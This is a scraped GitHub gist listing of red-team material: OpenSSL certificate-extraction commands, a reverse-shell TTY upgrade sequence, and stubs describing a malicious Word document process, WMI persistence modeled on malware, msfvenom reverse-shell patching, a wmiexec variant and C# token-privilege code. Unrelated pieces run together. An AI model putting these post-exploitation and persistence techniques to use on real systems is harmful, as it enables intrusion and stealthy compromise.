Extract the client certificate chain from the p12
# file names below are placeholders, following the naming used in the private-key command
openssl pkcs12 -in yourP12File.pfx -cacerts -nokeys -chain -out caChain.pem
Extract the client certificate
openssl pkcs12 -in yourP12File.pfx -clcerts -nokeys -out clientCert.pem
Extract the client's encrypted private key
openssl pkcs12 -in yourP12File.pfx -nocerts -out privateKey.pem
Import the PEM certificate into the Kafka brokers' truststore (one import for each certificate in the chain)
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
$ reset
@shelld0n
shelld0n / muti-stage-1.md
Created January 14, 2019 15:27 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

  • using the OLE event autorun method
  • removing its pretext shapes
  • obtaining the commands to be executed from the document's Author property and passing them to the StdIn of a Powershell.exe process
  • leveraging the certutil technique to receive a Base64-encoded malicious HTA document
  • having a Base64-encoded Powershell command in that Author property
@shelld0n
shelld0n / WMIPersistence.vbs
Created January 14, 2019 15:27 — forked from mgeeky/WMIPersistence.vbs
Visual Basic Script implementing the WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup roughly 3 minutes after the system boots.
'
' SYNOPSIS:
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched roughly 3 minutes after the system
' boots. Also, even if the command spawns a window, it will not be visible,
' since the command is invoked by WmiPrvSE.exe, which runs in Session 0.
'
@shelld0n
shelld0n / msfvenom-reverse-tcp-WaitForSingleObject.md
Created January 14, 2019 21:25 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@shelld0n
shelld0n / wmiexec_server_mode.py
Created September 20, 2019 15:25
Impacket wmiexec.py implementation supporting SERVER mode
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
@shelld0n
shelld0n / SYSTEM.cs
Last active December 30, 2019 15:54
SYSTEM Draft
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
namespace Token
{
class Program
@shelld0n
shelld0n / get_pid.ps1
Created January 31, 2020 21:27
get PID of system process
Get-Process -IncludeUserName | Where-Object {$_.UserName -like '*SYSTEM*'} | Select-Object ProcessName, Id, Handles
@shelld0n
shelld0n / AdjustTokenPrivileges.cs
Last active January 31, 2020 22:24
Adjust Token
// Luid Structure Definition
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public Int32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES
@shelld0n
shelld0n / API_imports.cs
Last active February 1, 2020 13:27
API_imports
// see https://www.pinvoke.net/default.aspx/advapi32.openprocesstoken
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY = 0x0008;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;